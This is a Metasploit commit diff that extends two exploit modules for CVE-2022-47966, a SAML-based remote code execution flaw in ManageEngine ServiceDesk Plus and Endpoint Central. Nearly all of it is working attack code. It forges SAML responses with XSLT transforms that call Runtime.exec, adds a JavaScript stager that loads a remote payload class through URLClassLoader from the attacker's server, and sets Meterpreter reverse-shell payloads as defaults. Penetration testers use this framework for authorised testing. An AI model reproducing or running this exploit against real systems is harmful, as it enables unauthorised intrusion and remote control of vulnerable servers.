Land rapid7#18796, Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966

cdelafuente-r7 · cdelafuente-r7 · commit 1e8e6d3bc417 · 2024-03-04T20:35:22.000+01:00
diff --git a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -46,7 +46,7 @@ def initialize(info = {})
               'Type' => :java,
               'Platform' => 'java',
               'Arch' => ARCH_JAVA,
-              'DefaultOptions' => { 'Payload' => 'java/shell_reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
             },
           ],
           [
@@ -65,7 +65,7 @@ def initialize(info = {})
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :windows_command,
-              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/https/x64/meterpreter/reverse_tcp' },
               'Payload' => { 'BadChars' => "\x27" }
             }
           ],
@@ -166,15 +166,15 @@ def trigger_urlclassloader
     # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
     url = get_uri
 
-    vars = Rex::RandomIdentifier::Generator.new
+    vars = Rex::RandomIdentifier::Generator.new({ language: :java })
 
     # stager for javascript engine
     java_stager = <<~EOS
       var #{vars[:file]} = Java.type(&quot;java.io.File&quot;);
       new #{vars[:file]}(&quot;../logs/serverout0.txt&quot;).delete();
       var #{vars[:str_arr]} = Java.type(&quot;java.lang.String[]&quot;);
-      var c = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
-      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[:str_arr]}(1)]);
+      var #{vars[:c]} = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
+      #{vars[:c]}.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[:str_arr]}(1)]);
     EOS
 
     transform = <<~EOT
@@ -186,10 +186,10 @@ def trigger_urlclassloader
             xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"
             xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
             <xsl:template match="/">
-                <xsl:variable name="engineobject" select="sem:new()"/>
-                <xsl:variable name="jsobject" select="sem:getEngineByName($engineobject,'javascript')"/>
-                <xsl:variable name="out" select="se:eval($jsobject,'#{java_stager}')"/>
-                <xsl:value-of select="$out"/>
+                <xsl:variable name="#{vars[:engineobject]}" select="sem:new()"/>
+                <xsl:variable name="#{vars[:jsobject]}" select="sem:getEngineByName($#{vars[:engineobject]},'javascript')"/>
+                <xsl:variable name="#{vars[:out]}" select="se:eval($#{vars[:jsobject]},'#{java_stager}')"/>
+                <xsl:value-of select="$#{vars[:out]}"/>
             </xsl:template>
             </xsl:stylesheet>
         </ds:Transform>
@@ -200,15 +200,15 @@ def trigger_urlclassloader
 
   def execute_command(cmd, _opts = {})
     case target['Type']
-    when :windows_dropper
+    when :windows_dropper, :windows_command
       cmd = "cmd /c #{cmd}"
     when :unix_cmd, :linux_dropper
       cmd = cmd.gsub(' ') { '${IFS}' }
       cmd = "bash -c #{cmd}"
     end
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
-    vars = Rex::RandomIdentifier::Generator.new
+    vars = Rex::RandomIdentifier::Generator.new({ language: :java })
 
     transform = <<~EOT
       <ds:Transforms>
@@ -285,6 +285,7 @@ def send_transform(transform)
     res
   end
 
+  # handle http requests from java stagers and cmd stagers differently
   def on_request_uri(cli, request)
     case target['Type']
     when :java
diff --git a/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb b/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -37,18 +38,25 @@ def initialize(info = {})
           ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
           ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
         ],
-        'Platform' => [ 'win' ],
-        'Payload' => {
-          'BadChars' => "\x27"
-        },
+        'Platform' => ['win', 'java'],
         'Targets' => [
+          [
+            'Java (in-memory)',
+            {
+              'Type' => :java,
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
+            },
+          ],
           [
             'Windows EXE Dropper',
             {
               'Platform' => 'win',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :windows_dropper,
-              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' },
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ],
           [
@@ -57,15 +65,16 @@ def initialize(info = {})
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :windows_command,
-              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/https/x64/meterpreter/reverse_tcp' },
+              'Payload' => { 'BadChars' => "\x27" }
             }
           ]
         ],
         'DefaultOptions' => {
-          'RPORT' => 8443,
-          'SSL' => true
+          'RPORT' => 8020,
+          'SSL' => false
         },
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 0,
         'DisclosureDate' => '2023-01-10',
         'Notes' => {
           'Stability' => [CRASH_SAFE,],
@@ -119,27 +128,85 @@ def encode_begin(real_payload, reqs)
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
+    when :java
+      # Start the HTTP server to serve the payload
+      start_service
+      # Trigger a loadClass request via java.net.URLClassLoader
+      trigger_urlclassloader
+      # Handle the payload
+      handler
     when :windows_command
       execute_command(payload.encoded)
     when :windows_dropper
       execute_cmdstager(delay: datastore['DELAY'])
     end
   end
 
+  def trigger_urlclassloader
+    # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
+    url = get_uri
+
+    vars = Rex::RandomIdentifier::Generator.new({ language: :java })
+
+    # stager for javascript engine
+    java_stager = <<~EOS
+      var #{vars[:file]} = Java.type(&quot;java.io.File&quot;);
+      new #{vars[:file]}(&quot;../logs/serverout0.txt&quot;).delete();
+      var #{vars[:str_arr]} = Java.type(&quot;java.lang.String[]&quot;);
+      var #{vars[:c]} = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
+      #{vars[:c]}.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[:str_arr]}(1)]);
+    EOS
+
+    transform = <<~EOT
+      <ds:Transforms>
+        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+            <xsl:stylesheet version="1.0"
+            xmlns:sem="http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager"
+            xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"
+            xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+                <xsl:variable name="#{vars[:engineobject]}" select="sem:new()"/>
+                <xsl:variable name="#{vars[:jsobject]}" select="sem:getEngineByName($#{vars[:engineobject]},'javascript')"/>
+                <xsl:variable name="#{vars[:out]}" select="se:eval($#{vars[:jsobject]},'#{java_stager}')"/>
+                <xsl:value-of select="$#{vars[:out]}"/>
+            </xsl:template>
+            </xsl:stylesheet>
+        </ds:Transform>
+      </ds:Transforms>
+    EOT
+    send_transform(transform)
+  end
+
   def execute_command(cmd, _opts = {})
-    if target['Type'] == :windows_dropper
-      cmd = "cmd /c #{cmd}"
-    end
+    cmd = "cmd /c #{cmd}"
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
+    vars = Rex::RandomIdentifier::Generator.new({ language: :java })
+
+    transform = <<~EOT
+      <ds:Transforms>
+        <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+          <xsl:stylesheet version="1.0"
+            xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+            xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+              <xsl:variable name="#{vars[:rt_obj]}" select="rt:getRuntime()"/>
+              <xsl:variable name="#{vars[:exec]}" select="rt:exec($#{vars[:rt_obj]},'#{cmd}')"/>
+              <xsl:variable name="#{vars[:out]}" select="ob:toString($#{vars[:exec]})"/>
+              <xsl:value-of select="$#{vars[:out]}"/>
+            </xsl:template>
+          </xsl:stylesheet>
+        </ds:Transform>
+      </ds:Transforms>
+    EOT
+
+    send_transform(transform)
+  end
+
+  def send_transform(transform)
     assertion_id = "_#{SecureRandom.uuid}"
-    # Randomize variable names and make sure they are all different using a Set
-    vars = Set.new
-    loop do
-      vars << Rex::Text.rand_text_alpha_lower(5..8)
-      break unless vars.size < 3
-    end
-    vars = vars.to_a
     saml = <<~EOS
       <?xml version="1.0" encoding="UTF-8"?>
       <samlp:Response
@@ -157,21 +224,7 @@ def execute_command(cmd, _opts = {})
               <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
               <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
               <ds:Reference URI="##{assertion_id}">
-                <ds:Transforms>
-                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
-                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
-                    <xsl:stylesheet version="1.0"
-                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
-                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-                      <xsl:template match="/">
-                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
-                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
-                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
-                        <xsl:value-of select="$#{vars[2]}"/>
-                      </xsl:template>
-                    </xsl:stylesheet>
-                  </ds:Transform>
-                </ds:Transforms>
+                #{transform}
                 <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
                 <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
               </ds:Reference>
@@ -191,7 +244,10 @@ def execute_command(cmd, _opts = {})
       }
     })
 
-    unless res&.code == 200
+    # Java payload returns a nil response on successful execution of payload
+    if target['Type'] == :java && res.nil?
+      print_status('Exploit completed.')
+    elsif res&.code != 200
       lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
       unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
         elog("Unkown error returned:\n#{lines.join("\n")}")
@@ -203,4 +259,16 @@ def execute_command(cmd, _opts = {})
     res
   end
 
+  # handle http requests from java stagers and cmd stagers differently
+  def on_request_uri(cli, request)
+    case target['Type']
+    when :java
+      super(cli, request)
+    else
+      client = cli.peerhost
+      print_status("Client #{client} requested #{request.uri}")
+      print_status("Sending payload to #{client}")
+      send_response(cli, exe)
+    end
+  end
 end
